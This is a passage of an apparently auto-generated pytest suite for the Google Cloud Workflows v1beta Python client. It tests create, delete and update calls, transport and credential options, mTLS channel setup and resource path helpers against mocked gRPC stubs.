workflow_id="workflow_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].workflow_id
mock_val = "workflow_id_value"
assert arg == mock_val
def test_create_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workflow(
workflows.CreateWorkflowRequest(),
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
@pytest.mark.asyncio
async def test_create_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workflow(
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].workflow_id
mock_val = "workflow_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workflow(
workflows.CreateWorkflowRequest(),
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
@pytest.mark.parametrize("request_type", [workflows.DeleteWorkflowRequest, dict,])
def test_delete_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
client.delete_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
@pytest.mark.asyncio
async def test_delete_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.DeleteWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workflow_async_from_dict():
await test_delete_workflow_async(request_type=dict)
def test_delete_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.DeleteWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_workflow_field_headers_async():
    """Async variant: delete_workflow propagates ``name`` into x-goog-request-params."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = workflows.DeleteWorkflowRequest()
    request.name = "name/value"
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/op")
        )
        await client.delete_workflow(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_workflow_flattened():
    """delete_workflow accepts the flattened ``name`` argument and copies it into the request."""
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = operations_pb2.Operation(name="operations/op")
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_workflow(name="name_value",)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        arg = args[0].name
        mock_val = "name_value"
        assert arg == mock_val
def test_delete_workflow_flattened_error():
    """Passing both a request object and flattened fields must raise ValueError."""
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_workflow(
            workflows.DeleteWorkflowRequest(), name="name_value",
        )
@pytest.mark.asyncio
async def test_delete_workflow_flattened_async():
    """delete_workflow (async) accepts the flattened ``name`` argument and copies it into the request."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.  (A dead
        # assignment of a bare Operation that was immediately overwritten
        # by this FakeUnaryUnaryCall has been removed.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_workflow(name="name_value",)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        arg = args[0].name
        mock_val = "name_value"
        assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_workflow_flattened_error_async():
    """Async variant: mixing a request object with flattened fields raises ValueError."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_workflow(
            workflows.DeleteWorkflowRequest(), name="name_value",
        )
@pytest.mark.parametrize("request_type", [workflows.UpdateWorkflowRequest, dict,])
def test_update_workflow(request_type, transport: str = "grpc"):
    """update_workflow: an empty request reaches the mocked stub and an LRO future is returned."""
    client = WorkflowsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = operations_pb2.Operation(name="operations/spam")
        response = client.update_workflow(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == workflows.UpdateWorkflowRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, future.Future)
def test_update_workflow_empty_call():
    """Calling update_workflow() with no arguments still sends a default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = WorkflowsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        client.update_workflow()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == workflows.UpdateWorkflowRequest()
@pytest.mark.asyncio
async def test_update_workflow_async(
    transport: str = "grpc_asyncio", request_type=workflows.UpdateWorkflowRequest
):
    """update_workflow (async): an empty request reaches the mocked stub and an LRO future is returned."""
    client = WorkflowsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
        response = await client.update_workflow(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == workflows.UpdateWorkflowRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workflow_async_from_dict():
    """Re-run the async update test with a plain dict request (proto coercion path)."""
    await test_update_workflow_async(request_type=dict)
def test_update_workflow_field_headers():
    """update_workflow sends ``workflow.name`` as an x-goog-request-params header."""
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = workflows.UpdateWorkflowRequest()
    request.workflow.name = "workflow.name/value"
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        call.return_value = operations_pb2.Operation(name="operations/op")
        client.update_workflow(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "workflow.name=workflow.name/value",) in kw[
        "metadata"
    ]
@pytest.mark.asyncio
async def test_update_workflow_field_headers_async():
    """Async variant: update_workflow propagates ``workflow.name`` into x-goog-request-params."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = workflows.UpdateWorkflowRequest()
    request.workflow.name = "workflow.name/value"
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/op")
        )
        await client.update_workflow(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "workflow.name=workflow.name/value",) in kw[
        "metadata"
    ]
def test_update_workflow_flattened():
    """update_workflow accepts flattened ``workflow``/``update_mask`` arguments."""
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = operations_pb2.Operation(name="operations/op")
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_workflow(
            workflow=workflows.Workflow(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        arg = args[0].workflow
        mock_val = workflows.Workflow(name="name_value")
        assert arg == mock_val
        arg = args[0].update_mask
        mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
        assert arg == mock_val
def test_update_workflow_flattened_error():
    """Passing both a request object and flattened fields must raise ValueError."""
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_workflow(
            workflows.UpdateWorkflowRequest(),
            workflow=workflows.Workflow(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )
@pytest.mark.asyncio
async def test_update_workflow_flattened_async():
    """update_workflow (async) accepts flattened ``workflow``/``update_mask`` arguments."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
        # Designate an appropriate return value for the call.  (A dead
        # assignment of a bare Operation that was immediately overwritten
        # by this FakeUnaryUnaryCall has been removed.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_workflow(
            workflow=workflows.Workflow(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        arg = args[0].workflow
        mock_val = workflows.Workflow(name="name_value")
        assert arg == mock_val
        arg = args[0].update_mask
        mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
        assert arg == mock_val
@pytest.mark.asyncio
async def test_update_workflow_flattened_error_async():
    """Async variant: mixing a request object with flattened fields raises ValueError."""
    client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_workflow(
            workflows.UpdateWorkflowRequest(),
            workflow=workflows.Workflow(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )
def test_credentials_transport_error():
    """Mutually exclusive client options (credentials/api_key/scopes vs. a transport) raise ValueError."""
    # It is an error to provide credentials and a transport instance.
    transport = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = WorkflowsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport,
        )
    # It is an error to provide a credentials file and a transport instance.
    transport = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = WorkflowsClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )
    # It is an error to provide an api_key and a transport instance.
    transport = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    options = client_options.ClientOptions()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = WorkflowsClient(client_options=options, transport=transport,)
    # It is an error to provide an api_key and a credential.
    options = mock.Mock()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = WorkflowsClient(
            client_options=options, credentials=ga_credentials.AnonymousCredentials()
        )
    # It is an error to provide scopes and a transport instance.
    transport = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = WorkflowsClient(
            client_options={"scopes": ["1", "2"]}, transport=transport,
        )
def test_transport_instance():
    """A client built around an explicit transport instance must expose that
    exact object via ``client.transport``."""
    prebuilt = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    wrapped = WorkflowsClient(transport=prebuilt)
    assert wrapped.transport is prebuilt
def test_transport_get_channel():
    """Both the sync and asyncio gRPC transports expose a truthy channel."""
    sync_transport = transports.WorkflowsGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    assert sync_transport.grpc_channel
    async_transport = transports.WorkflowsGrpcAsyncIOTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    assert async_transport.grpc_channel
@pytest.mark.parametrize(
    "transport_class",
    [transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport,],
)
def test_transport_adc(transport_class):
    """Transports fall back to application-default credentials when none are supplied."""
    # Test default credentials are used if not provided.
    with mock.patch.object(google.auth, "default") as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        adc.assert_called_once()
def test_transport_grpc_default():
    """When no transport is specified, the client defaults to gRPC."""
    # A client should use the gRPC transport by default.
    client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
    assert isinstance(client.transport, transports.WorkflowsGrpcTransport,)
def test_workflows_base_transport_error():
    """Supplying both credentials and a credentials file raises DuplicateCredentialArgs."""
    # Passing both a credentials object and credentials_file should raise an error
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transport = transports.WorkflowsTransport(
            credentials=ga_credentials.AnonymousCredentials(),
            credentials_file="credentials.json",
        )
def test_workflows_base_transport():
    """The abstract base transport raises NotImplementedError for every RPC, close(), and the LRO client."""
    # Instantiate the base transport.
    with mock.patch(
        "google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport.__init__"
    ) as Transport:
        Transport.return_value = None
        transport = transports.WorkflowsTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )
    # Every method on the transport should just blindly
    # raise NotImplementedError.
    methods = (
        "list_workflows",
        "get_workflow",
        "create_workflow",
        "delete_workflow",
        "update_workflow",
    )
    for method in methods:
        with pytest.raises(NotImplementedError):
            getattr(transport, method)(request=object())
    with pytest.raises(NotImplementedError):
        transport.close()
    # Additionally, the LRO client (a property) should
    # also raise NotImplementedError
    with pytest.raises(NotImplementedError):
        transport.operations_client
def test_workflows_base_transport_with_credentials_file():
    """A credentials file is loaded with the cloud-platform default scope and quota project."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch(
        "google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.WorkflowsTransport(
            credentials_file="credentials.json", quota_project_id="octopus",
        )
        load_creds.assert_called_once_with(
            "credentials.json",
            scopes=None,
            default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
            quota_project_id="octopus",
        )
def test_workflows_base_transport_with_adc():
    """The base transport consults ADC when neither credentials nor a file are given."""
    # Test the default credentials are used if credentials and credentials_file are None.
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
        "google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.WorkflowsTransport()
        adc.assert_called_once()
def test_workflows_auth_adc():
    """The client uses ADC with the cloud-platform default scope when no credentials are given."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        WorkflowsClient()
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
            quota_project_id=None,
        )
@pytest.mark.parametrize(
    "transport_class",
    [transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport,],
)
def test_workflows_transport_auth_adc(transport_class):
    """Transports forward explicit scopes and quota project to the ADC lookup."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        adc.assert_called_once_with(
            scopes=["1", "2"],
            default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class,grpc_helpers",
    [
        (transports.WorkflowsGrpcTransport, grpc_helpers),
        (transports.WorkflowsGrpcAsyncIOTransport, grpc_helpers_async),
    ],
)
def test_workflows_transport_create_channel(transport_class, grpc_helpers):
    """Channel creation passes ADC credentials, scopes, host, and message-size options through."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(
        google.auth, "default", autospec=True
    ) as adc, mock.patch.object(
        grpc_helpers, "create_channel", autospec=True
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        adc.return_value = (creds, None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        create_channel.assert_called_with(
            "workflows.googleapis.com:443",
            credentials=creds,
            credentials_file=None,
            quota_project_id="octopus",
            default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
            scopes=["1", "2"],
            default_host="workflows.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize(
    "transport_class",
    [transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_grpc_transport_client_cert_source_for_mtls(transport_class):
    """mTLS: explicit ssl_channel_credentials win; otherwise client_cert_source_for_mtls builds them."""
    cred = ga_credentials.AnonymousCredentials()
    # Check ssl_channel_credentials is used if provided.
    with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
        mock_ssl_channel_creds = mock.Mock()
        transport_class(
            host="squid.clam.whelk",
            credentials=cred,
            ssl_channel_credentials=mock_ssl_channel_creds,
        )
        mock_create_channel.assert_called_once_with(
            "squid.clam.whelk:443",
            credentials=cred,
            credentials_file=None,
            scopes=None,
            ssl_credentials=mock_ssl_channel_creds,
            quota_project_id=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
    # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
    # is used.
    with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
        with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
            transport_class(
                credentials=cred,
                client_cert_source_for_mtls=client_cert_source_callback,
            )
            expected_cert, expected_key = client_cert_source_callback()
            mock_ssl_cred.assert_called_once_with(
                certificate_chain=expected_cert, private_key=expected_key
            )
def test_workflows_host_no_port():
    """An api_endpoint without a port gets the default :443 appended."""
    client = WorkflowsClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=client_options.ClientOptions(
            api_endpoint="workflows.googleapis.com"
        ),
    )
    assert client.transport._host == "workflows.googleapis.com:443"
def test_workflows_host_with_port():
    """An api_endpoint with an explicit port is used verbatim."""
    client = WorkflowsClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=client_options.ClientOptions(
            api_endpoint="workflows.googleapis.com:8000"
        ),
    )
    assert client.transport._host == "workflows.googleapis.com:8000"
def test_workflows_grpc_transport_channel():
    """A user-supplied channel is adopted verbatim by the sync gRPC transport."""
    channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.WorkflowsGrpcTransport(
        host="squid.clam.whelk", channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Identity comparison (`is None`) rather than `== None`, per PEP 8 (E711).
    assert transport._ssl_channel_credentials is None
def test_workflows_grpc_asyncio_transport_channel():
    """A user-supplied channel is adopted verbatim by the asyncio gRPC transport."""
    channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.WorkflowsGrpcAsyncIOTransport(
        host="squid.clam.whelk", channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Identity comparison (`is None`) rather than `== None`, per PEP 8 (E711).
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
    "transport_class",
    [transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_transport_channel_mtls_with_client_cert_source(transport_class):
    """Deprecated api_mtls_endpoint/client_cert_source args still build an mTLS channel (with a warning)."""
    with mock.patch(
        "grpc.ssl_channel_credentials", autospec=True
    ) as grpc_ssl_channel_cred:
        with mock.patch.object(
            transport_class, "create_channel"
        ) as grpc_create_channel:
            mock_ssl_cred = mock.Mock()
            grpc_ssl_channel_cred.return_value = mock_ssl_cred
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            cred = ga_credentials.AnonymousCredentials()
            with pytest.warns(DeprecationWarning):
                with mock.patch.object(google.auth, "default") as adc:
                    adc.return_value = (cred, None)
                    transport = transport_class(
                        host="squid.clam.whelk",
                        api_mtls_endpoint="mtls.squid.clam.whelk",
                        client_cert_source=client_cert_source_callback,
                    )
                    adc.assert_called_once()
            grpc_ssl_channel_cred.assert_called_once_with(
                certificate_chain=b"cert bytes", private_key=b"key bytes"
            )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
            assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
    "transport_class",
    [transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_transport_channel_mtls_with_adc(transport_class):
    """Deprecated api_mtls_endpoint with client_cert_source=None uses ADC SSL credentials."""
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        with mock.patch.object(
            transport_class, "create_channel"
        ) as grpc_create_channel:
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            mock_cred = mock.Mock()
            with pytest.warns(DeprecationWarning):
                transport = transport_class(
                    host="squid.clam.whelk",
                    credentials=mock_cred,
                    api_mtls_endpoint="mtls.squid.clam.whelk",
                    client_cert_source=None,
                )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=mock_cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
def test_workflows_grpc_lro_client():
    """The sync transport lazily builds and caches an OperationsClient."""
    client = WorkflowsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )
    transport = client.transport
    # Ensure that we have a api-core operations client.
    assert isinstance(transport.operations_client, operations_v1.OperationsClient,)
    # Ensure that subsequent calls to the property send the exact same object.
    assert transport.operations_client is transport.operations_client
def test_workflows_grpc_lro_async_client():
    """The asyncio transport lazily builds and caches an OperationsAsyncClient."""
    client = WorkflowsAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
    )
    transport = client.transport
    # Ensure that we have a api-core operations client.
    assert isinstance(transport.operations_client, operations_v1.OperationsAsyncClient,)
    # Ensure that subsequent calls to the property send the exact same object.
    assert transport.operations_client is transport.operations_client
def test_workflow_path():
    """workflow_path() renders the canonical workflow resource name."""
    proj, loc, wf = "squid", "clam", "whelk"
    rendered = WorkflowsClient.workflow_path(proj, loc, wf)
    assert rendered == f"projects/{proj}/locations/{loc}/workflows/{wf}"
def test_parse_workflow_path():
    """parse_workflow_path() inverts workflow_path() back to its components."""
    expected = {
        "project": "octopus",
        "location": "oyster",
        "workflow": "nudibranch",
    }
    path = WorkflowsClient.workflow_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_workflow_path(path)
    assert expected == actual
def test_common_billing_account_path():
    """common_billing_account_path() renders billingAccounts/{billing_account}."""
    acct = "cuttlefish"
    rendered = WorkflowsClient.common_billing_account_path(acct)
    assert rendered == f"billingAccounts/{acct}"
def test_parse_common_billing_account_path():
    """parse_common_billing_account_path() inverts common_billing_account_path()."""
    expected = {
        "billing_account": "mussel",
    }
    path = WorkflowsClient.common_billing_account_path(**expected)
    # Check that the path construction is reversible.
    actual = WorkflowsClient.parse_common_billing_account_path(path)
    assert expected == actual
def test_common_folder_path():
    """common_folder_path() renders folders/{folder}."""
    folder_id = "winkle"
    assert WorkflowsClient.common_folder_path(folder_id) == f"folders/{folder_id}"
def test_parse_common_folder_path():
    """parse_common_folder_path() inverts common_folder_path()."""
    expected = {
        "folder": "nautilus",
    }
